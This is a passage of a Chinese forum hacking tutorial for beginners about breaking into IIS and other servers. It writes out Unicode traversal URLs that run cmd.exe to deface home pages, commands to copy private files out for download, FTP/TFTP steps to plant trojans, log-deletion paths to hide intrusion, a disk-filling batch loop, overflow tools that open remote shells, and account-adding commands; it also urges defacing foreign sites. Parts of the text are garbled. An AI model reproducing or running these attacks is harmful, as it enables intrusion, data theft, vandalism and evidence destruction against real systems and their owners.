&gt;c:\autoexe.bat就是把cshu加入autoexec.bat里并刪除原有內(nèi)容,echo cshunice &gt;&gt;c:\autoexec.bat就是加入cshunice但不刪除原有內(nèi)容,這樣我們就可以逍遙的改了。 <BR><BR>11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+hackedbycshu+&gt;c:\inetpub\wwwroot\index.htm <BR><BR>回應(yīng)為:HTTP 500 - 內(nèi)部服務(wù)器錯(cuò)誤 <BR><BR>通過(guò)對(duì)cmd的分析,袁哥得出一條簡(jiǎn)便的方法,加入"符號(hào) <BR><BR>11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+hackedbycshu+&gt;c:\inetpub\wwwroot\index.htm <BR><BR>11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+2001730+&gt;&gt;c:\inetpub\wwwroot\index.htm <BR><BR>回應(yīng)為:cgi錯(cuò)誤,不用理會(huì) <BR><BR>兩條命令一下,呵呵,再看看11.11.22.22,是不是烙上我們的大名了?不錯(cuò)吧 <BR><BR>而在實(shí)際操作中,可能袁哥的方法也會(huì)失效,這時(shí),我們就可以copy cmd.exe 為另一個(gè)exe,記住路徑,用copy后的來(lái)echo <BR><BR>例如:11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+cmd.exe+c:\a.exe <BR><BR>11.11.22.22/scripts/..%c1%1c../a.exe?/c+echo+hackedbycshu+&gt;c:\inetpub\wwwroot\index.htm <BR><BR>2,上傳法:echo有點(diǎn)不講道理,把人家的文件破壞了,要是想在主頁(yè)上增光添彩,那就應(yīng)該用改好的主頁(yè)</DIV>
      8#
       樓主| 發(fā)表于 2008-9-25 18:51:17 | 只看該作者
      <DIV class=tpc_content id=read_493>基礎(chǔ)知識(shí)(4)<BR><BR><BR>上傳,這個(gè)我們后面介紹。 <BR><BR>幾點(diǎn)忠告: <BR><BR>1,對(duì)于沒(méi)有主頁(yè)的機(jī)器(就是正在建立的主頁(yè)),不要改它,這很沒(méi)水準(zhǔn),也很沒(méi)道德 <BR><BR>2,echo前記得幫他們做好備份 <BR><BR>3,不準(zhǔn)在主頁(yè)里加入惡性語(yǔ)句 <BR><BR>2,下載文件 <BR><BR>要是有什么有用的文件被你發(fā)現(xiàn),那我們?nèi)绾蜗螺d呢? <BR><BR>最簡(jiǎn)單的方法:把文件copy至網(wǎng)頁(yè)目錄下。copy c:\email\baby.eml c:\inetpub\wwwroot\baby.zip,然后,下載11.11.22.22/baby.zip就行了,注意!實(shí)際應(yīng)用中要記得對(duì)文件名進(jìn)行修改,總之不能暴露。 <BR><BR>別的方法:對(duì)不起,沒(méi)想好:) <BR><BR>3,最重要的上傳 <BR><BR>一般方法:ftp法 <BR><BR>首先建一個(gè)ftp腳本文件:c:\hehe.haha(名字亂取把),申請(qǐng)一個(gè)ftp賬號(hào),然后用echo吧 <BR><BR>echo+open ftp.cshu.com(ftp主機(jī)) &gt; c:\hehe.haha <BR><BR>echo+user yourname &gt;&gt; cc:\hehe.haha (yourname是用戶名) <BR><BR>echo+yourpasswd &gt;&gt; c:\hehe.haha (yourpasswd是密碼) <BR><BR>echo+get setup.exe &gt;&gt; c:\hehe.haha 要下載的文件 <BR><BR>echo+quit &gt;&gt; c:\hehe.haha <BR><BR>完了以后:ftp+/s:c:\hehe.haha,由于是ftp主機(jī),那么速度一定很快,過(guò)一會(huì)setup.exe就會(huì)出現(xiàn)在當(dāng)前目錄了(也就是cmd所在目錄) <BR><BR>別忘了先上傳到ftp主機(jī),不要做馬大哈哦! <BR><BR>最簡(jiǎn)單的方法:tftp法。 <BR><BR>這種方法不用中轉(zhuǎn)服務(wù)器,首先準(zhǔn)備一個(gè)tftp服務(wù)端,它的作用就是把你的機(jī)器做成一個(gè)tftp服務(wù)器,利用漏洞機(jī)器來(lái)下載(注意,運(yùn)行tftp時(shí)不要運(yùn)行其他的ftp軟件) <BR><BR>在這里我推薦cisco tftp server,自己去找找把,實(shí)在沒(méi)有來(lái)找我:) <BR><BR>安裝好后運(yùn)行,別忘了設(shè)置好默認(rèn)目錄,否則會(huì)找不到文件 <BR><BR>tftp命令:tftp -i 1.2.3.4 GET ihateu.exe c:\winnt\ihateu.exe(ihateu.exe在默認(rèn)目錄里) <BR><BR>1.2.3.4為你的ip,用unicode運(yùn)行一下,會(huì)看到tftp server里有反應(yīng)了,這就好了,不一會(huì),文件就傳上去了,方便把! <BR><BR>學(xué)會(huì)了上傳,我們就可以好好改主頁(yè),還可以上傳木馬,還可以把程序放上去運(yùn)行…………(運(yùn)行程序和在dos里一樣) <BR><BR>4,如何清除痕跡 <BR><BR>雖然國(guó)內(nèi)主機(jī)紀(jì)錄ip的不是很多,但萬(wàn)事小心為妙,unicode權(quán)限達(dá)不到admin。用cleaniislog行不通,就…………直接刪吧! <BR><BR>C:\winnt\system32\logfiles\*.* <BR><BR>C:\winnt\ssytem32\config\*.evt <BR><BR>C:\winnt\system32\dtclog\*.* <BR><BR>C:\winnt\system32\*.log <BR><BR>C:\winnt\system32\*.txt <BR><BR>C:\winnt\*.txt <BR><BR>C:\winnt\*.log <BR><BR>全……擦掉! <BR><BR>四,細(xì)節(jié)問(wèn)題。 <BR><BR>1,遇到長(zhǎng)文件名怎么辦? <BR><BR>c:\program files\ <BR><BR>就用c:\"program20%files"\ <BR><BR>2,遇到空格怎么辦?<BR>%代替嘍,或者xx yy=xxyy~1 <BR>基礎(chǔ)知識(shí)(5)<BR><BR><BR>%代替嘍,或者xx yy=xxyy~1 <BR><BR>3,如何做個(gè)很大的文件? <BR><BR>目的就是破壞啦!我不喜歡不過(guò)教教你們啦 <BR><BR>@echo off <BR><BR>echo big &gt; c:\a.a <BR><BR>:h <BR><BR>copy c:\a.a+c:\a.a c:\a.a <BR><BR>goto h <BR><BR>注意不要亂來(lái)?。?<BR><BR>4,輸入命令,沒(méi)反應(yīng)或反應(yīng)不對(duì)。 <BR><BR>:)請(qǐng)檢查檢查再檢查命令的正確性,可能沒(méi)有漏洞,那就閃人!看在你看到這里那么給我面子的份上,在給你幾個(gè)吧! <BR><BR><A href="http://www.exsample.com/scripts/" target=_blank><FONT color=#2f5fa1>http://www.exsample.com/scripts/</FONT></A> ... macr;..&Agrave; <BR>&macr;../winnt/system32/cmd.exe?/c+dir+c :\ 或 <A href="http://www.exsample.com/" target=_blank><FONT color=#2f5fa1>http://www.exsample.com/msadc/..</FONT></A> ... 2/cmd.exe?/c+dir+c:\ 或 <A href="http://www.exsample.com/_vti_bin" target=_blank><FONT color=#2f5fa1>http://www.exsample.com/_vti_bin</FONT></A> ... 2/cmd.exe?/c+dir+c:\ 或 <A href="http://www.exsample.com/_mem_bin" target=_blank><FONT color=#2f5fa1>http://www.exsample.com/_mem_bin</FONT></A> ... 2/cmd.exe?/c+dir+c:\ <BR><BR>不一定有用哦! <BR><BR>5,如何找到unicode漏洞的主機(jī) <BR><BR>呵呵:)最好的方法自然是………………一個(gè)一個(gè)ping,一個(gè)一個(gè)試嘍:) <BR><BR>不要打我呀!我說(shuō)我說(shuō)。最好找一個(gè)cgi掃描器,unicode查找器多如牛毛,隨便找個(gè)吧! <BR><BR>6,我copy,del文件,怎么顯示aceess denined? <BR><BR>這個(gè)不好辦了,由于unicode所擁有的權(quán)限有限,出現(xiàn)上述情況很正常,我們要做的便是提高自己的權(quán)限! <BR><BR>這個(gè)我會(huì)在今后介紹,現(xiàn)在你可以試試attrib <BR><BR>attrib -r -h -s c:\autoexec.bat <BR><BR>再對(duì)autoexec.bat進(jìn)行操作,看看有沒(méi)有效果,成功率不高,不好意思! <BR><BR>7,我黑了主頁(yè),天下無(wú)敵? <BR><BR>我本來(lái)想對(duì)你說(shuō):“見(jiàn)你的鬼去吧!”不過(guò)想想不大禮貌,有失我紳士風(fēng)度,所以改個(gè)口 <BR><BR>echo主頁(yè)或改主頁(yè)在不懂黑客的人看起來(lái)很了不起,不過(guò),它最多算是一個(gè)基礎(chǔ),拿到admin才是我們的終極目標(biāo)! <BR><BR>對(duì)cshu全體成員來(lái)說(shuō),不準(zhǔn)去改正在建立的網(wǎng)頁(yè)!這是我們的原則! <BR><BR>要是你想耍耍威風(fēng),那也可以理解,那就去黑外國(guó)的,或者url欺騙也是個(gè)好選擇 <BR><BR>8,我如何做更多的事? <BR><BR>第一,努力提高權(quán)限 <BR><BR>第二,由于cmd的限制,我們可以做的不多,那就要程序幫忙,上傳吧!切記,要隱秘! <BR><BR><BR>一,frontpage擴(kuò)展攻擊。 <BR><BR>為什么把它放第一位呢?原因很簡(jiǎn)單,它最最方便,frontpage服務(wù)器擴(kuò)展是一種方便的遠(yuǎn)程站點(diǎn)管理功能,可是由于某些網(wǎng)管注意文明用語(yǔ)的疏忽(為什么注意文明用語(yǔ)滿街飛?)不設(shè)置訪問(wèn)密碼,如果那樣的話,我們只要用一個(gè)frontpage就可以黑它了??!這完全不是黑客工具,但它確實(shí)辦到了,還要感謝注意文明用語(yǔ)網(wǎng)管和微軟啊! <BR><BR>具體做法: <BR><BR>1,準(zhǔn)備frontpage,我是用dreamweaver的,但它不能黑?。海┳詈檬?000版,只是不要是老掉牙的版本就行了。 <BR><BR>2,找一臺(tái)有frontpage擴(kuò)展的主機(jī),可以用流光,也可以用搜索引擎查找/_vti_pvt/,這是frontpage擴(kuò)展的標(biāo)志。 <BR><BR>3,接下來(lái)打開(kāi)frontpage,(媽媽:你在干什么?回答:做網(wǎng)頁(yè)!媽媽:好孩子!)文件菜單下選擇“打開(kāi)站點(diǎn)”,然后在文件夾框里寫(xiě)入 <A href="http://11.11.22.22/" target=_blank><FONT color=#2f5fa1>http://11.11.22.22</FONT></A>(我習(xí)慣用這個(gè)做例子,以...僮魍?澄募?恕?/a&gt; <BR><BR>4,萬(wàn)一跳出錯(cuò)誤信息,表示有密碼(這個(gè)不算注意文明用語(yǔ))這時(shí)我們?cè)囍靡韵聈rl, <A href="http://11.11.22.22/_vti_pvt/service.pwd" target=_blank><FONT color=#2f5fa1>http://11.11.22.22/_vti_pvt/service.pwd</FONT></A>,這...盎箍梢愿耐?場(chǎng)?/a&gt; <BR><BR>我的看法: <BR><BR>這個(gè)漏洞只能說(shuō)明網(wǎng)管的疏忽,對(duì)我們而言是沒(méi)有什么利用價(jià)值的,只可以改改網(wǎng)頁(yè),也許這也夠了,但要進(jìn)一步控制主機(jī),此漏洞就無(wú)能為力。消遣時(shí)可以玩玩。 <BR><BR>二,iis.printer溢出攻擊 <BR><BR>據(jù)說(shuō)緩沖區(qū)溢出攻擊是黑客入侵時(shí)70%所選的方法,看起來(lái)有點(diǎn)夸張,但確實(shí)有道理,因?yàn)楸┝γ艽a破解在網(wǎng)絡(luò)上變得非常之慢,而像unicode的解碼漏洞所取得的權(quán)限又太低,而緩沖區(qū)溢出一般可取得system權(quán)限,是非常有用的! <BR><BR>具體原理我也不是很清楚,只能說(shuō)個(gè)大概:當(dāng)我們向系統(tǒng)發(fā)出超出緩沖區(qū)大小的數(shù)據(jù)處理請(qǐng)求時(shí),便會(huì)引發(fā)溢出,并彈出錯(cuò)誤對(duì)話框,我們??吹降摹胺欠ú僮鳌逼鋵?shí)也是可能是由于溢出。而當(dāng)溢出時(shí),eip發(fā)生錯(cuò)誤,有匯編知識(shí)的朋友應(yīng)該記得,eip是控制執(zhí)行代碼的位置(順便問(wèn)一下,有沒(méi)有會(huì)crack的高人,記得做我老師)這時(shí)加入一段惡性代碼,算好發(fā)生溢出時(shí)的eip值,這樣溢出時(shí)就會(huì)執(zhí)行惡性代碼而不是當(dāng)?shù)簟7欠ú僮魑覀冎蓝嗟牟坏昧?,因此……溢出攻擊是非常?qiáng)大的! <BR><BR>由于匯編對(duì)于我們來(lái)說(shuō)較難掌握,加之對(duì)溢出的了解很有限,那么我們只能借助高手們的程序來(lái)黑了。 <BR><BR>具體方法: <BR><BR>1,準(zhǔn)備iishack,本站有下載,該版本可以對(duì)多種系統(tǒng)進(jìn)行攻擊。 <BR><BR>2,用x-scan或流光掃描一個(gè)有iis.printer漏洞的主機(jī),然后就可以攻擊了。 <BR><BR>3,在命令行方式執(zhí)行iis5hack (主機(jī)ip) (端口號(hào),默認(rèn)80)(系統(tǒng)代號(hào),具體可參考程序的說(shuō)明) ( shell口) <BR><BR>例如:iis5hack 11.11.22.22 80 1 111(以為在111端口開(kāi)一個(gè)shell) <BR><BR>4,用nc或telnet連上,nc/telnet 11.11.22.22 111,成功的話就可以控制機(jī)器了,加個(gè)用戶,做個(gè)代理…… <BR><BR>我的看法: <BR><BR>這算是一個(gè)比較有用的漏洞了,它能幫助我們?nèi)〉胹ystem權(quán)限,其實(shí)和admin差不了多少了,對(duì)于做一臺(tái)跳板是非常有利的,希望大家熟練掌握。 <BR><BR>三,idq/ida漏洞溢出攻擊 <BR><BR>這是時(shí)下很熱門(mén)的了,原理和上面的printer相似,目前我只找到了iis5的攻擊程序,在cshu里也可以找到的,我們準(zhǔn)備的是snake的gui版本,很方便的。 <BR><BR>具體方法: <BR><BR>1,準(zhǔn)備snakeiis溢出程序??梢詮谋菊鞠螺d。 <BR><BR>2,ida/idq漏洞很多的,但win2k的服務(wù)器就不是那么普遍了,所以用你熟練的掃描器去找一打win2k的機(jī)器吧。 <BR><BR>3,程序的界面是很傻瓜的,把ip填入,選擇好類型,按下溢出按鈕,顯示shellcode發(fā)送完畢。 <BR><BR>4,telnet/nc到你設(shè)定好的端口,如果成功的話,會(huì)顯示目錄下的信息(因?yàn)槟J(rèn)shellcode是dir) <BR><BR>5,歡呼吧!再次溢出,別忘了改shellcode為你想要的代碼哦。 <BR><BR>6,重復(fù)4,很快一臺(tái)新鮮的win2k被你控制了! <BR><BR>我的看法: <BR><BR>我很喜歡用這種攻擊,因?yàn)閣in2k的3389可以很方便的為我做事,省力地搞到一臺(tái)win2k,然后慢慢享用,爽到根尖細(xì)胞??!大家應(yīng)該掌握這項(xiàng)方法。 <BR><BR>四,*bsd telnetd溢出攻擊 <BR><BR>又是溢出,不過(guò)這個(gè)可是真正的熱點(diǎn)哦,最近紅盟等大型安全網(wǎng)站被黑就是因?yàn)檫@個(gè)!所以看看吧 <BR><BR>具體方法: <BR><BR>1,使用fbsdhack for win2k來(lái)攻擊,本站有下載的 <BR><BR>2,還是要找到這樣的主機(jī),一般是xnix的,比較少的,用專門(mén)的掃描器吧,我會(huì)在不久放出來(lái)。 <BR><BR>3,等吧!這個(gè)漏洞要發(fā)送的信息很大,大約16mb,可怕吧,所以最好用高速肉雞 <BR><BR>4,有幸成功了,記得請(qǐng)我吃飯! <BR><BR>我的看法: <BR><BR>這個(gè)漏洞的利用比較有難度,從找機(jī)器開(kāi)始就是。但作為黑客愛(ài)好者,我們沒(méi)有理由去回避它!<BR><BR><BR><BR><BR>五,密碼暴力破解 <BR><BR>這是最最原始,也是最最基本的攻擊的方式了,利用字典文件或暴力模式,對(duì)密碼進(jìn)行探測(cè)。費(fèi)時(shí)費(fèi)力,但若有經(jīng)驗(yàn)的話,可以縮短這一過(guò)程。 <BR><BR>具體方法: <BR><BR>1,找一個(gè)破解器,有ftp,http,smtp,pop3,telnet等等類型。 <BR><BR>2,找到一臺(tái)相應(yīng)的主機(jī)。 <BR><BR>3,設(shè)定一番,上路吧!你可以睡覺(jué),可以去machine(就是做作業(yè)),可以去泡妞……就是不要傻等。為什么呢?因?yàn)闀?huì)傷視力的:)怎么倒了一片,起來(lái)起來(lái)! <BR><BR>4,萬(wàn)一成功了(之所以用這個(gè)詞,是因?yàn)槌晒β屎艿偷模┍砻髂氵\(yùn)氣旺,趕緊下線,買(mǎi)彩票去吧 <BR><BR><BR>大家好,這幾天被cgi程序搞得頭昏腦脹,主要還是51的錯(cuò),什么破東西,那么多錯(cuò)誤!現(xiàn)在只好暫時(shí)借人家的地方用。 <BR><BR>這是菜鳥(niǎo)操的最后第二節(jié),說(shuō)實(shí)話我還可以寫(xiě)很多的,但是作業(yè)還欠了一大堆:(為什么我沒(méi)有滿舟的狗屎運(yùn)?算了算了,我不合那種欺世盜名之輩一般見(jiàn)識(shí),開(kāi)始做操吧! <BR><BR>不知道大家對(duì)unicode和溢出攻擊是不是熟練了?沒(méi)有的要加油哦!今天我們來(lái)談?wù)剻?quán)限的提升。 <BR><BR>在windows系統(tǒng)中,最高的權(quán)限掌握在administrators的手里,在xnix中稱為root,我們要完全掌握一臺(tái)機(jī)器,拿到admin是不可或缺的。 <BR><BR>首先說(shuō)說(shuō)最簡(jiǎn)單的:system to admin <BR><BR>當(dāng)我們用溢出攻擊成功后,其實(shí)我們已經(jīng)拿到了system權(quán)限(具體看每種攻擊而可能有所不同)這時(shí)我們很容易拿到admin權(quán)限。首先看看一下命令: <BR><BR>net user 察看用戶表 net user username pass /add(添加密碼為pass的用戶username) <BR><BR>net localgroup 察看組 net localgroup guests cshu /add 把cshu用戶加入guests組 <BR><BR>net use \\ip\ipc$ "password" /user:username 這是遠(yuǎn)程連接的命令 <BR><BR>假如我們溢出了11.11.22.22,那么這樣做吧! <BR><BR>net user (看到了iusr_machinename的用戶了,它一般沒(méi)什么權(quán)限的)</DIV>
      您需要登錄后才可以回帖 登錄 | 注冊(cè)

      本版積分規(guī)則

      QQ|本地廣告聯(lián)系: QQ:905790666 TEL:13176190456|Archiver|手機(jī)版|小黑屋|汶上信息港 ( 魯ICP備19052200號(hào)-1 )

      GMT+8, 2025-4-19 23:07

      Powered by Discuz! X3.5

      © 2001-2025 Discuz! Team.

      快速回復(fù) 返回頂部 返回列表